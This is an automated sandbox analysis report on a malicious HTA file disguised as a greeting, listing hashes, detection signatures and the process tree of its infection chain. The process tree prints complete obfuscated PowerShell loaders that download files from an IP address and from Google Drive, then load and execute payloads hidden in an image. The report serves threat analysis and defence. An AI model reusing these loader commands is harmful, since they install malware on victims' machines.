Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
05-11-2024 07:32
Static task
static1
Behavioral task
behavioral1
Sample
bestgreetingwithbestthingsevermadewithgreatthigns.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
bestgreetingwithbestthingsevermadewithgreatthigns.hta
Resource
win10v2004-20241007-en
General
-
Target
bestgreetingwithbestthingsevermadewithgreatthigns.hta
-
Size
206KB
-
MD5
64d1fd56bfbbb3698a9550ea63759364
-
SHA1
dcb935d539fa987f85bdda8bf43ac3d2f368df13
-
SHA256
706e2d312d3693ccd38e6b489e13e12db863b723865f7f05580bcdc1c779a342
-
SHA512
906a7a5df0c4891a3a89abc253a494efbb382e2a75f035b3aabc6cdac94f9b09324f370e326b12edd461f21a889d41c041bd44131c334e0b2b395ff813fc1e93
-
SSDEEP
48:4FhWsTR/F7gNqXfDx4l0i2F4B0i2Nq87ONSK4EkcdQ03+ljAymG987n1adW4yV4u:43F97/OlLBgTK9Q03+ljNAolv2lq/Q
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2300 PoWERshElL.ExE 6 2260 powershell.exe 8 2260 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2736 powershell.exe 2260 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2300 PoWERshElL.ExE 2080 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 drive.google.com 6 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PoWERshElL.ExE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2300 PoWERshElL.ExE 2080 powershell.exe 2300 PoWERshElL.ExE 2300 PoWERshElL.ExE 2736 powershell.exe 2260 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2300 PoWERshElL.ExE Token: SeDebugPrivilege 2080 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 2260 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1916 wrote to memory of 2300 1916 mshta.exe 30 PID 1916 wrote to memory of 2300 1916 mshta.exe 30 PID 1916 wrote to memory of 2300 1916 mshta.exe 30 PID 1916 wrote to memory of 2300 1916 mshta.exe 30 PID 2300 wrote to memory of 2080 2300 PoWERshElL.ExE 32 PID 2300 wrote to memory of 2080 2300 PoWERshElL.ExE 32 PID 2300 wrote to memory of 2080 2300 PoWERshElL.ExE 32 PID 2300 wrote to memory of 2080 2300 PoWERshElL.ExE 32 PID 2300 wrote to memory of 2772 2300 PoWERshElL.ExE 33 PID 2300 wrote to memory of 2772 2300 PoWERshElL.ExE 33 PID 2300 wrote to memory of 2772 2300 PoWERshElL.ExE 33 PID 2300 wrote to memory of 2772 2300 PoWERshElL.ExE 33 PID 2772 wrote to memory of 2368 2772 csc.exe 34 PID 2772 wrote to memory of 2368 2772 csc.exe 34 PID 2772 wrote to memory of 2368 2772 csc.exe 34 PID 2772 wrote to memory of 2368 2772 csc.exe 34 PID 2300 wrote to memory of 2636 2300 PoWERshElL.ExE 36 PID 2300 wrote to memory of 2636 2300 PoWERshElL.ExE 36 PID 2300 wrote to memory of 2636 2300 PoWERshElL.ExE 36 PID 2300 wrote to memory of 2636 2300 PoWERshElL.ExE 36 PID 2636 wrote to memory of 2736 2636 WScript.exe 38 PID 2636 wrote to memory of 2736 2636 WScript.exe 38 PID 2636 wrote to memory of 2736 2636 WScript.exe 38 PID 2636 wrote to memory of 2736 2636 WScript.exe 38 PID 2736 wrote to memory of 2260 2736 powershell.exe 40 PID 2736 wrote to memory of 2260 2736 powershell.exe 40 PID 2736 wrote to memory of 2260 2736 powershell.exe 40 PID 2736 wrote to memory of 2260 2736 powershell.exe 40
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bestgreetingwithbestthingsevermadewithgreatthigns.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\WINdOwSpoweRSheLL\V1.0\PoWERshElL.ExE"C:\Windows\SYStEM32\WINdOwSpoweRSheLL\V1.0\PoWERshElL.ExE" "PowErShEll -Ex BYPaSS -NOP -W 1 -C dEVIcEcrEDEnTIAlDePlOYmENt.EXe ; iex($(iEX('[SYsTeM.TeXt.EnCoding]'+[chAr]0X3A+[CHAr]0X3A+'uTf8.geTSTring([SYstem.ConVERT]'+[chAR]58+[CHAR]58+'fRoMBASE64string('+[CHar]0X22+'JGVhNmM4bXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlckRlZmluSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OLmRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENmbXIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYVV2eVZCUkQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZmWWxEb2wsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb0ZYckloKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiU3V4dFBJQkp4bCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbklZcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZWE2YzhtclQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuNTIvMzUvcGljdHVyZXdpdGhhdHRpdHVkZWV2ZW5iZXR0ZXJmb3JhbGx0aGluZ3MudElGIiwiJGVOdjpBUFBEQVRBXHBpY3R1cmV3aXRoYXR0aXR1ZGVldmVuYmV0dGVyZm9yYWxsdGhpbi52YnMiLDAsMCk7U1RBUnQtc2xlZVAoMyk7c3RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoYXR0aXR1ZGVldmVuYmV0dGVyZm9yYWxsdGhpbi52YnMi'+[cHar]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSS -NOP -W 1 -C dEVIcEcrEDEnTIAlDePlOYmENt.EXe3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i1y4v0de.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB626.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB625.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2368
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithattitudeevenbetterforallthin.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdpWEtpbScrJ2FnJysnZVVybCA9IE5RMGh0dHBzOi8vZHJpdmUuZ29vZ2xlJysnLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MVV5SHF3cm5YQ2xLQkozajYzTGwxdDJTdFZnR3hiU3QwIE5RMDtpWEt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5Jysnc3RlbS5OZXQuVycrJ2ViQ2xpZW50O2lYSycrJ2ltYWdlQnl0ZXMgPSBpWCcrJ0t3ZWJDbGllbnQuRG93bmxvYWREYXRhKGlYS2ltYWdlVXJsKTtpWEtpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW4nKydjb2RpbmddOjonKydVVEY4LkdldFN0cmluZyhpWEtpbWFnZUJ5dGVzKTtpWEtzdGFydEZsYWcgPSBOUTA8PEJBU0U2NF9TVEFSVD4+TlEwO2lYS2VuZEZsYWcgPSBOUTA8PEJBU0U2NF9FTkQ+Pk5RMDtpWEtzdGFydEluZGV4ID0gaVhLaW1hZ2VUZXh0LkluZGV4T2YoaVhLc3RhcnRGbGFnKTtpWEtlbmRJbmRleCA9IGlYS2ltYWdlVGV4dC5JbmRleE9mKGlYS2VuZEZsYWcpO2lYS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBpWEtlbmQnKydJbmRleCAtZ3QgaVhLc3RhcnRJbmRleDtpWEtzdGFydEluZGV4ICs9IGlYS3N0YXJ0RmxhZycrJy5MZW5ndGg7aVhLYmFzZTY0TGVuZ3RoID0gaVhLZW5kSW5kZXgnKycgLSBpWEtzdGFydEluJysnZGV4O2lYS2Jhc2U2NENvbW1hbmQgPSBpWEtpbWFnZVRleHQuU3Vic3RyaW4nKydnKGlYS3N0JysnYXJ0SW5kZXgsJysnIGlYS2Jhc2U2NExlbmd0aCk7aVhLYmFzZTY0UmV2ZXJzZWQgPSAtam8nKydpbiAoaVhLYmEnKydzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIDJDUSBGb3JFYWNoLU9iamVjdCB7IGlYS18gfSlbLTEuLi0oaVhLYmFzZTY0Q28nKydtbWFuZC5MZW5ndGgpXTtpWEtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvJysnbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKGlYS2Jhc2U2NFJldmVyc2VkKTtpWEtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoaVhLY29tbWFuZEJ5dGVzKTtpWEt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKE5RMFZBSU5RMCk7aVhLdmFpTWV0aG9kLkknKydudm9rZShpWEtudWxsLCBAKE5RMHR4dC5VTExQTVMvNTMvMjUuNy44NjEuNDAxLy86cHR0aE5RMCwgTlEwZGVzYXRpdmFkb05RMCwgTlEwZGVzYXRpdmFkbycrJ05RMCwgTlEwZGVzYXRpdmFkb05RMCwgTlEwYXNwbmV0X3JlZ2Jyb3dzZXJzTlEwLCBOUTBkZXNhdGl2YWRvTlEwLCBOUScrJzBkZXNhdGl2YWRvTlEwLE5RMGRlc2F0aXZhZG9OUTAsTlEwZGVzYXRpdmFkb05RMCxOUTBkZXNhdGl2YScrJ2RvTlEwLE5RMGRlc2F0aXZhZG9OUTAsTlEwZGVzYXQnKydpdmFkb05RMCxOUTAxTlEwLE5RMGRlc2F0aXZhZG9OUTApKTsnKS5SRVBsYWNlKCcyQ1EnLCd8JykuUkVQbGFjZSgnaVhLJyxbc1RyaU5nXVtjaGFyXTM2KS5SRVBsYWNlKChbY2hhcl03OCtbY2hhcl04MStbY2hhcl00OCksW3NUcmlOZ11bY2hhcl0zOSkgfCAuICggJHNoRWxMSURbMV0rJHNIZUxsaURbMTNdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('iXKim'+'ag'+'eUrl = NQ0https://drive.google'+'.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 NQ0;iXKwebClient = New-Object Sy'+'stem.Net.W'+'ebClient;iXK'+'imageBytes = iX'+'KwebClient.DownloadData(iXKimageUrl);iXKimageText = [System.Text.En'+'coding]::'+'UTF8.GetString(iXKimageBytes);iXKstartFlag = NQ0<<BASE64_START>>NQ0;iXKendFlag = NQ0<<BASE64_END>>NQ0;iXKstartIndex = iXKimageText.IndexOf(iXKstartFlag);iXKendIndex = iXKimageText.IndexOf(iXKendFlag);iXKstartIndex -ge 0 -and iXKend'+'Index -gt iXKstartIndex;iXKstartIndex += iXKstartFlag'+'.Length;iXKbase64Length = iXKendIndex'+' - iXKstartIn'+'dex;iXKbase64Command = iXKimageText.Substrin'+'g(iXKst'+'artIndex,'+' iXKbase64Length);iXKbase64Reversed = -jo'+'in (iXKba'+'se64Command.ToCharArray() 2CQ ForEach-Object { iXK_ })[-1..-(iXKbase64Co'+'mmand.Length)];iXKcommandBytes = [System.Co'+'nvert]::FromBase64String(iXKbase64Reversed);iXKloadedAssembly = [System.Reflection.Assembly]::Load(iXKcommandBytes);iXKvaiMethod = [dnlib.IO.Home].GetMethod(NQ0VAINQ0);iXKvaiMethod.I'+'nvoke(iXKnull, @(NQ0txt.ULLPMS/53/25.7.861.401//:ptthNQ0, NQ0desativadoNQ0, NQ0desativado'+'NQ0, NQ0desativadoNQ0, NQ0aspnet_regbrowsersNQ0, NQ0desativadoNQ0, NQ'+'0desativadoNQ0,NQ0desativadoNQ0,NQ0desativadoNQ0,NQ0desativa'+'doNQ0,NQ0desativadoNQ0,NQ0desat'+'ivadoNQ0,NQ01NQ0,NQ0desativadoNQ0));').REPlace('2CQ','|').REPlace('iXK',[sTriNg][char]36).REPlace(([char]78+[char]81+[char]48),[sTriNg][char]39) | . ( $shElLID[1]+$sHeLliD[13]+'X')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a1163b669d979411e753e4662427745a
SHA13a88f7c8405ebbaeed1bc563e396d0807ae6a956
SHA256571d5cc655ec1d6673e01064c3f37bbf16884e6629c6b31c61dc79293f4151db
SHA5129e705b05874d07880f00cf279991ac5e944918a5653a3998021185a5284e78a0c4999a98b85b37d3864eb0200f6e5accf7549b57afa75fa209048b8914ada0fd
-
Filesize
3KB
MD5b6eb2097cb60320d4a8e9bb31578ec3e
SHA15f6314e1911cc44e9e85cc4da58f2d282b5c5b2b
SHA25692c5e00b41dcee69bf3144c5930b3e23c08291e4c43ae2f9eea374ea44ac9a23
SHA5129791d50044b36a06a5fd9f3d7f9106c13726eaece371d822f3d82e811bc70a5f35c044031a982e8bfc5adee1331192f5028336b81c21d612f9d9e99c611d1bc8
-
Filesize
7KB
MD5026ea8634777287b2e7a212af8a091ba
SHA1120e2d73ce6857a1942450420d88968d70993dc6
SHA256dd564450a3bfb3c358db255490e3950b70ecbc1f19f211be6a784b9f3f3d3a4f
SHA512062ceffb853a2c10380835798032694bfa5dca67498184c11a555a02ac63a25e2e343dc1fa13430b315c5280d7c547a67473f8256db0e9b420142ce58b2976b2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD59c5845ffd7f95d0f63b1d01400479c1f
SHA113fcc1e7244f07e36cdc33fe17dcd7105f8f54d5
SHA2561ed678f5a33a043bfe654391eed0335d05d238213d45ddff8f0c3929ac34dc33
SHA5127ea321038aaf2c3eb9c19cc7a0d9cd0e534dd8f0ba376556df40ed0f555fba5ebf0f1806991a0c508927c4d0ed86f5d4166265048b6855915c9825d3d386c99d
-
Filesize
137KB
MD58575080d678736f4370fa4b88d00c148
SHA1ec4023c9d47d5d4c93e1f76d6400c6dfbec3a143
SHA256521c52c7c4e3e15c8d9805eeb75b45c85679c7ac9e744d9f53d67a7840cf309f
SHA5123b3e106f9ff3f57a41ca101e179c373e0782a1d5a82a113ee72b993893c4f5ad615d075631904ee3ab417f4b7f10062f15153280b159623ad8b0f71d49073593
-
Filesize
652B
MD59d2beb82d77a91126da0307d4547c802
SHA1ea90957562a3563161aea17d8cc267cbacdda202
SHA2568a772f3dd27af6a45a2ffcb729fed284c734c54ac1a347651c52281d7ef8e67c
SHA512af61d22af405150b860dddb681f587d0bbead9a610aed752be5dbb54d13d5260a7d811e444365f986a51a393a07b22276bc1eefda1c3799b2ac405286ace11f4
-
Filesize
478B
MD53da4ad222b76364bbe83d07f6bbf5f06
SHA16b4be35e25435be0f75e9db059c91e3a230e81d7
SHA2561cf28334727114e790315d7a9bbc1b3512b68694b50dad3b8fcf402ff3a7eee6
SHA5124585510bc72ffd7635f53505edb14082520781df4a9f58be5d090190e76663a9254f1fe2eff5471b5703df98acc58890dc87d6ff2542edc136c96f521c5409fd
-
Filesize
309B
MD57aecb391edaa2df0fdf249a0dbe90717
SHA12ea6aa29beb6b5498385f27a75641c583be995dd
SHA2566d4a6a42f04e3164c90c98f7a2e4bae149a45a2b7f22ebab2d5a3dc9c4409e9f
SHA5121145e83cd17095064e63895ca4c60f48fa105ca9ff3ab4bfa97747328ae37ebde5d77426659aefcc664ff998eedc24d9de8a4720110ed287826d35e037b9594d